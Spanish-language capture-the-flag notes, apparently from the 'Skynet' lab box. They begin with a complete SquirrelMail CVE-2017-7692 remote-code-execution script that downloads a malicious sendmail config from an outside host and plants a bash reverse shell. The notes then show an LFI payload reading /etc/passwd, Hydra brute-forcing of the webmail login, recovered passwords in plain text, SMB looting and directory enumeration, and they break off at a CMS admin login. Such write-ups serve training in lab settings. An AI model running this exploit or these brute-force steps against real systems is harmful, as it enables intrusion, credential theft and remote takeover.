# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
sqspool="/var/spool/squirrelmail/attach/"
echo -e "$int"
#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"
# Base URL
if [ $# -ne 1 ]; then
echo -e "Usage: \n$0 SquirrelMail_URL"
echo -e "Example: \n$0 http://target/squirrelmail/ \n"
exit 2
fi
URL="$1"
# Log in
echo -e "\n[*] Enter SquirrelMail user credentials"
read -p "user: " squser
read -sp "pass: " sqpass
echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
if [ $? -eq 0 ]; then
echo "Invalid creds"
exit 2
fi
sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
# Prepare Sendmail cnf
#
# * The config will launch php via the following stanza:
#
# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
# T=DNS/RFC822/X-Unix,
# A=php -- $u $h ${client_addr}
#
wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf
# Upload config
echo -e "\n\n[*] Uploading Sendmail config"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
if [ ${#attachid} -lt 32 ]; then
echo "Something went wrong. Failed to upload the sendmail file."
exit 2
fi
# Create Sendmail cmd string according to selected payload
echo -e "\n\n[?] Select payload\n"
# SELECT PAYLOAD
echo "1 - File write (into /tmp/sqpoc)"
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
echo
read -p "[1-2] " pchoice
case $pchoice in
1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"
;;
2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"
;;
esac
if [ $pchoice -eq 2 ]; then
echo
read -p "Reverese shell IP: " reverse_ip
read -p "Reverese shell PORT: " reverse_port
fi
# Reverse shell code
phprevsh="
<?php
\$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
?>"
# Set sendmail params in user settings
echo -e "\n[*] Injecting Sendmail command parameters"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
if [ $? -ne 0 ]; then
echo "Failed to inject sendmail parameters"
exit 2
fi
# Send email which triggers the RCE vuln and runs phprevsh
echo -e "\n[*] Sending the email to trigger the vuln"
(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &
if [ $pchoice -eq 2 ]; then
echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
nc -vv -l -p $reverse_port
else
echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
fi
grep -q "302 Found" /tmp/sheaders
if [ $? -eq 1 ]; then
echo "There was a problem with sending email"
exit 2
fi
# Done
echo -e "\n[*] All done. Exiting"
Y VEMOS ESTE OTRO EXPLOIT EXPLICATIVO:
┌──(root㉿kali)-[~]
└─# searchsploit -m php/webapps/27948.txt
Exploit: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
URL: https://www.exploit-db.com/exploits/27948
Path: /usr/share/exploitdb/exploits/php/webapps/27948.txt
File Type: ASCII text
Copied to: /root/27948.txt
┌──(root㉿kali)-[~]
└─# ls
27948.txt Desktop Documents Downloads Music Pictures Public Templates Videos exploitpaimon.sh
┌──(root㉿kali)-[~]
└─# mv 27948.txt exploitpaimondos.txt
┌──(root㉿kali)-[~]
└─# cat exploitpaimondos.txt
source: https://www.securityfocus.com/bid/18231/info
SquirrelMail is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit may allow unauthorized users to view files and to execute local scripts; other attacks are also possible.
http://www.example.com/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00
--------------- INTENTAMOS CONECTOARNOS A LOS SERVICIOS DE POP3 Y IMAP SINCREDENCIALES Y NEGATIFO -----
┌──(root㉿kali)-[~]
└─# telnet 10.10.37.190 110
Trying 10.10.37.190...
Connected to 10.10.37.190.
Escape character is '^]'.
+OK Dovecot ready.
-ERR Unknown command.
stat
-ERR Unknown command.
USER skynet
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
^C
exit
QUIT
Connection closed by foreign host.
┌──(root㉿kali)-[~]
└─# ls
Desktop Documents Downloads Music Pictures Public Templates Videos exploitpaimon.sh exploitpaimondos.txt
┌──(root㉿kali)-[~]
└─# telnet 10.10.37.190 143
Trying 10.10.37.190...
Connected to 10.10.37.190.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.
c1 LIST "" "*"
c1 BAD Error in IMAP command received by server.
c2 LOGIN guest
c2 BAD Error in IMAP command received by server.
QUIT
* BYE Too many invalid IMAP commands.
Connection closed by foreign host.
-------------- INTENTAMOS CONECTOARNOS A LOS SERVICIOS DE SAMBA Y ENCONTRAMOS ALGO SOBRE EL USUARIO MILESDYSON ----
┌──(root㉿kali)-[~]
└─# smbclient -L //10.10.37.190/
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
EL UNICO RECURSO AL QUE PUDIMOS CONECTARNOS ES AL ANONIMUOS Y BINGO ENCONTRAMOS ALGO DE INFOERMACION, SIN REQUERIR DE CREDENCIALES Y NOS DESCARGAMOS LOS ARCHIVOS DE ATENTION.TXT Y LOS TRES LOGS.TXT:
┌──(root㉿kali)-[~]
└─# smbclient //10.10.37.190/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 07:20:17 2019
attention.txt N 163 Wed Sep 18 03:04:59 2019
logs D 0 Wed Sep 18 04:42:16 2019
9204224 blocks of size 1024. 5830064 blocks available
smb: \> cat attention.txt
cat: command not found
smb: \> less attention.txt
less: command not found
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (79.6 KiloBytes/sec) (average 79.6 KiloBytes/sec)
smb: \> get logs
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \logs
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 04:42:16 2019
.. D 0 Thu Nov 26 16:04:00 2020
log2.txt N 0 Wed Sep 18 04:42:13 2019
log1.txt N 471 Wed Sep 18 04:41:59 2019
log3.txt N 0 Wed Sep 18 04:42:16 2019
9204224 blocks of size 1024. 5830064 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (230.0 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 123.8 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 103.2 KiloBytes/sec)
smb: \logs\>
LEEMOS LOS ARCHIVOS:
┌──(root㉿kali)-[~]
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
TRADUCCION:
┌──(raíz㉿kali)-[~]
└─#atención gato.txt
Un mal funcionamiento reciente del sistema ha provocado que se cambien varias contraseñas. Todos los empleados de Skynet deben cambiar su contraseña después de ver esto.
-Miles Dyson
CATEAMOS LOS LOGS Y SOLO EL NUMERO UNO 1 TENIA PASSWD:
┌──(root㉿kali)-[~]
└─# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
┌──(root㉿kali)-[~]
└─# cat log2.txt
┌──(root㉿kali)-[~]
└─# cat log3.txt
-------------------- FUERZA BRUTA AL PASSWD DEL SERVICIO SQUIRREMAIL USANDO BURPSUITE SNIPER -----
12 terminator1056 0 false true 0
16 terminator00 0 false true 0
0 200 false false 3277
1 cyborg007haloterminator 200 false false 3277
2 terminator22596 200 false false 3277
3 terminator219 200 false false 3277
4 terminator20 200 false false 3277
5 terminator1989 200 false false 3277
6 terminator1988 200 false false 3277
7 terminator168 200 false false 3277
8 terminator16 200 false false 3277
9 terminator143 200 false false 3277
10 terminator13 200 false false 3277
11 terminator123!@# 200 false false 3277
13 terminator101 200 false false 3277
14 terminator10 200 false false 3277
15 terminator02 200 false false 3277
17 roboterminator 200 false false 3277
18 pongterminator 200 false false 3277
19 manasturcaluterminator 200 false false 3277
20 exterminator95 200 false false 3277
21 exterminator200 200 false false 3277
22 dterminator 200 false false 3277
23 djxterminator 200 false false 3277
24 dexterminator 200 false false 3277
25 determinator 200 false false 3277
26 cyborg007haloterminator 200 false false 3277
27 avsterminator 200 false false 3277
28 alonsoterminator 200 false false 3277
29 Walterminator 200 false false 3277
30 79terminator6 200 false false 3277
31 1996terminator 200 false false 3277
NO VEMOS NADA QUE NOS LALAME LA ATENCION EN LOS LENGH ETC....
-------------------- FUERZA BRUTA AL PASSWD DEL SERVICIO SQUIRREMAIL USANDO HYDRA -----
hydra -l miles -P passwdskynet.txt http://10.10.37.190/squirrelmail/src/login.php http-post-form
“login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:Login
ERROR”
hydra -l miles -P passwdskynet.txt http-post-form "http://10.10.37.190/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:incorrect"
┌──(root㉿kali)-[~]
└─# hydra -l miles -P passwdskynet.txt 10.10.37.190 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font color="#cc0000" data-darkreader-inline-color="" style="--darkreader-inline-color: #ff3d3d;"><b>ERROR</b></font>"
CASI FUNCIONA EL COPMANDO AHI QUE IDENTIFICAR BIEN EL MENSAJE DE ERROR CONTRA EL LOGIN DE SquirrelMail version 1.4.23 [SVN]:
hydra -l miles -P passwdskynet.txt 10.10.37.190 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:Login
ERROR"
hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font color="#cc0000" data-darkreader-inline-color="" style="--darkreader-inline-color: #ff3d3d;"><b>ERROR</b></font>"
hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>"
LUEGO DE PERFECCIONAR EL COMANDO CON HYDRA CONSEGUIMOS ACOMODAR BIEN LA DETECCION DEL LOGIN FAILD Y QUE SOLO SE FRENE AL ENCONTRARA LA PRIMER COINCIDENCIA DE PASSWD CORRECTO Y BIENGO CONSEGUIMOS EL PASSWD CORRECTO CON HYDRA HACIENDOP FUERZA BRUTA AL LOGIN SQUIRRELMAIL CON EL USER MILES, la line esta ([STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)) en el resultado nos ayudad a determinar tambien que la linea anterior fue el PASSWD correcto:
┌──(root㉿kali)-[~]
└─# hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1 -stop
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-03 16:41:53
[DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task
[DATA] attacking http-post-form://10.10.37.103:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 10.10.37.103 login: miles password: cyborg007haloterminator
[STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-03 16:41:53
RESULTADO I MPORTANTE:
[80][http-post-form] host: 10.10.37.103 login: miles password: cyborg007haloterminator
TAMBIEN CON EL USER MILESDYSON:
┌──(root㉿kali)-[~]
└─# hydra -l milesdyson -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-03 17:11:53
[DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task
[DATA] attacking http-post-form://10.10.37.103:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 10.10.37.103 login: milesdyson password: cyborg007haloterminator
[STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-03 17:11:53
IMPORTANTE:
[80][http-post-form] host: 10.10.37.103 login: milesdyson password: cyborg007haloterminator
**********************
--------- PARAMOS POR FALTA DE TIEMPO ASI QUE ESCRIBO RECORDATORIO PARA SABER QUE CONTINUAR HACIENDO, OBVIO CAMBIARAN SOLO LAS IP DE LAS MAQUINAS ------
CONTRASEÑA DE MILES VIENDO EL LARGO DE LA RESPUESTA
miles:cyborg007haloterminator
SEGUIR PROBANDO ESTAS CREDENCIALES TAMBIEN EN LOS LOGUEOS DE POP3 Y IMAP o SSH y VER DE PULIR EL DETECTOR DE LOGIN FAILED DE HYDRA...!!!!
PROBAMOS POR POP3 Y NEGATIVO DIOERROR TLS
PROBAMOS POR IMAP Y NEGATIVO DIOERROR TLS
PROBAMOS POR SSH Y NO TOMA EL PASSWD
PROBANDO CREDENCIALES EN SMBCLIENT:
DATOS ANTERIORES:
smbclient -L //10.10.37.190/
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
POR EL MOMENTO NO NOS TOMA LAS CREDENCIALES MILES Y EL PASSWD EN SMB
----------------------------
***********************
------------------------- LOGIN SQUIRRELMAIL --------------------------------
BIEN PAPA SE TNZO VOLVIMOS A PROBAR EL LOGIN EN EL PANEL DEL SERVICIO SQUIRRELMAIL PERO CON LAS SIGUINTES CREDENCIALES Y AHORA SI SE TENZO :D :
milesdyson:cyborg007haloterminator
http://10.10.37.103/squirrelmail/src/login.php
SITIO WEB:
Current Folder: INBOX Sign Out
Compose Addresses Folders Options Search Help SquirrelMail
Toggle All Viewing Messages: 1 to 3 (3 total)
Move Selected To: Transform Selected Messages:
INBOX
From sort Date sort Subject sort
skynet@skynet Sep 17, 2019 Samba Password reset
serenakogan@skynet Sep 17, 2019 (no subject)
serenakogan@skynet Sep 17, 2019 (no subject)
Toggle All Viewing Messages: 1 to 3 (3 total)
-----
TRATAMOS DE LEER LA INFORMACION DEL PANEL:
MENSAJE DE SKYNET@SKYNET SE TENZO TENEMOS OITRO PASSWD:
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 9:10 pm
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
----
MENSAJE DE serenakogan@skynet SE TENEMOS ALGUN TIPO DE MENSAJE EN BINARIO Y LO PASAMOS A TEXTO PLANOP CON GPT:
From: serenakogan@skynet
Date: Tue, September 17, 2019 2:16 am
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
PLANO:
Claro, el código que proporcionaste es una secuencia de bits que se puede convertir a texto. La traducción a texto plano es:
vbnet
Copy code
balls have zero to me to me to me to me to me to me to
las pelotas tienen cero para mí para mí para mí para mí para mí para mí para
Espero que esto sea útil. Si tienes más preguntas o necesitas ayuda con algo más, ¡no dudes en preguntar!
------
MENSAJE DE serenakogan@skynet SE TENEMOS ALGUN TIPO DE MENSAJE RARO RELACIONADO AL ANTERIOR PASADO EN TEXTO PLANO:
From: serenakogan@skynet
Date: Tue, September 17, 2019 2:13 am
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
FRAUDGPT NOS LEYO SUPUESTAMENTE COMO QUE EL MESJAE OCULTO EN LIMPIO SERIA ESTE:
Puedo tener pelotas conmigo, tú tienes cero conmigo, todo lo demás.
-----
ANALISAMOS MAS PARTES DEL PANEL TENEMOS UNO PARA CARGAR ARCHIVOS Y ENVIAR MAIL, AGREGAR CONTACTOS; CREAR FOLDER Y MAS:
http://10.10.37.103/squirrelmail/src/compose.php?mailbox=INBOX&startMessage=1
http://10.10.37.103/squirrelmail/src/addressbook.php
http://10.10.37.103/squirrelmail/src/folders.php
---------------- SCRIPT DEL EXPLOIT ENCONTRADO CON SEARCHSPLOIT -------------------------
NO FUNCIONO CON LAS CREDENCIALES QUE NOS SIRVIERON ANTES:
---------------- SMBCLIENT ------------------------------
NOS LOGUEAMOS AL RECURSO DEL MILESDYSON CON EL PASSWD ENCONTRADO EN EL MAIL MENSAJE DE SKYNET@SKYNET Y SE TENZO, DESCARGAMOS VARIOS PDF, NOTES Y DOCUMENTOS QUE HABIAN:
┌──(root㉿kali)-[~]
└─# smbclient //10.10.37.103/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 09:05:47 2019
.. D 0 Wed Sep 18 03:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 09:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 09:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 09:05:14 2019
notes D 0 Tue Sep 17 09:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 09:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 09:05:14 2019
9204224 blocks of size 1024. 5831420 blocks available
smb: \> get Improving Deep Neural Networks.pdf
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Improving
smb: \> get "Improving Deep Neural Networks.pdf"
getting file \Improving Deep Neural Networks.pdf of size 5743095 as Improving Deep Neural Networks.pdf (91942.3 KiloBytes/sec) (average 91942.5 KiloBytes/sec)
smb: \> get "Natural Language Processing-Building Sequence Models.pdf"
getting file \Natural Language Processing-Building Sequence Models.pdf of size 12927230 as Natural Language Processing-Building Sequence Models.pdf (109776.0 KiloBytes/sec) (average 103595.1 KiloBytes/sec)
smb: \> get "Convolutional Neural Networks-CNN.pdf"
getting file \Convolutional Neural Networks-CNN.pdf of size 19655446 as Convolutional Neural Networks-CNN.pdf (127117.6 KiloBytes/sec) (average 114457.2 KiloBytes/sec)
smb: \> get "Neural Networks and Deep Learning.pdf"
getting file \Neural Networks and Deep Learning.pdf of size 4304586 as Neural Networks and Deep Learning.pdf (91384.5 KiloBytes/sec) (average 111611.8 KiloBytes/sec)
smb: \> get "Structuring your Machine Learning Project.pdf"
getting file \Structuring your Machine Learning Project.pdf of size 3531427 as Structuring your Machine Learning Project.pdf (98532.8 KiloBytes/sec) (average 110489.9 KiloBytes/sec)
smb: \> get notes
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \notes
smb: \> cd notes
smb: \notes\> pwd
Current directory is \\10.10.37.103\milesdyson\notes\
smb: \notes\> ls
. D 0 Tue Sep 17 09:18:40 2019
.. D 0 Tue Sep 17 09:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 09:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 09:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 09:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 09:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 09:01:29 2019
important.txt N 117 Tue Sep 17 09:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 09:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 09:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 09:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 09:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 09:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 09:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 09:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 09:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 09:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 09:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 09:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 09:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 09:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 09:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 09:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 09:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 09:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 09:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 09:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 09:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 09:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 09:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 09:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 09:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 09:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 09:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 09:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 09:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 09:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 09:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 09:01:29 2019
9204224 blocks of size 1024. 5831412 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (38.1 KiloBytes/sec) (average 109683.7 KiloBytes/sec)
smb: \notes\> get Search.md
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \notes\Search.md
LEEMOS Y VEMOS LOS ARCHIVOS DESACRGADOS:
┌──(root㉿kali)-[~]
└─# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
TRADUCCION:
1. Agregar funciones al CMS beta /45kra24zxs28v3yd
2. Trabajar en los planos del T-800 Modelo 101.
3. Pasar más tiempo con mi esposa
VERIFICAMOS POR LA WEB Y ERA UNA RUTA LO QUE APARECIA EN EL MENSAJE:
http://10.10.37.103/45kra24zxs28v3yd/
Miles Dyson Personal Page
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet,
a computer A.I. intended to control electronically linked weapons and defend the United States.
Página personal de Miles Dyson
El Dr. Miles Bennett Dyson fue el inventor original del procesador de red neuronal que conduciría al desarrollo de Skynet.
una computadora A.I. destinado a controlar las armas vinculadas electrónicamente y defender a los Estados Unidos.
----
ANALIZAMOS LOS PDF RAPIDO Y NO VEO NINGUN DATO DE BORRADOR ANOTADO IMPORTANTE COMO PASSWD Y TAL.
------------------------- GOBUSTER --------------------------
INTENAMOS BUSCAR MAS RUTAS A PARTIR DEL DIRECTORIO OCULTO ENCONTARDO EN SMBCLIENT DE MILESDYSON:
gobuster dir -u http://10.10.37.103/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
BINGO NUESTRA ÑLOGICA FUNCVIONO; A PARTIR DE ESE DIRECTO OCULTO GOBUSTER ENCONTRO UN DIRECTORIO ADMINISTRATOR :D :
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.37.103/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.37.103/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/02/03 18:03:52 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/administrator (Status: 301) [Size: 337] [--> http://10.10.37.103/45kra24zxs28v3yd/administrator/]
/index.html (Status: 200) [Size: 418]
===============================================================
2024/02/03 18:03:53 Finished
================================
BIGO NOS LLEVO A UN LOGIN DE CUPPA CMS PROBAREMOS LOGEARNOS CON LO QUE TENEMOS HASTA AHORA:
http://10.10.37.103/45kra24zxs28v3yd/administrator/
WEB:
Use a valid username and password to gain access to the administrator
Username
Password
ENCONTRAMOS UN PANEL COMENTADO DE UNA RECUPERACION DE CONTRASEÑA APARENTEMNTE:
<!--
<a class="forgot_password" onclick="ShowPanel('forget')">Forgot Password?</a>
-->
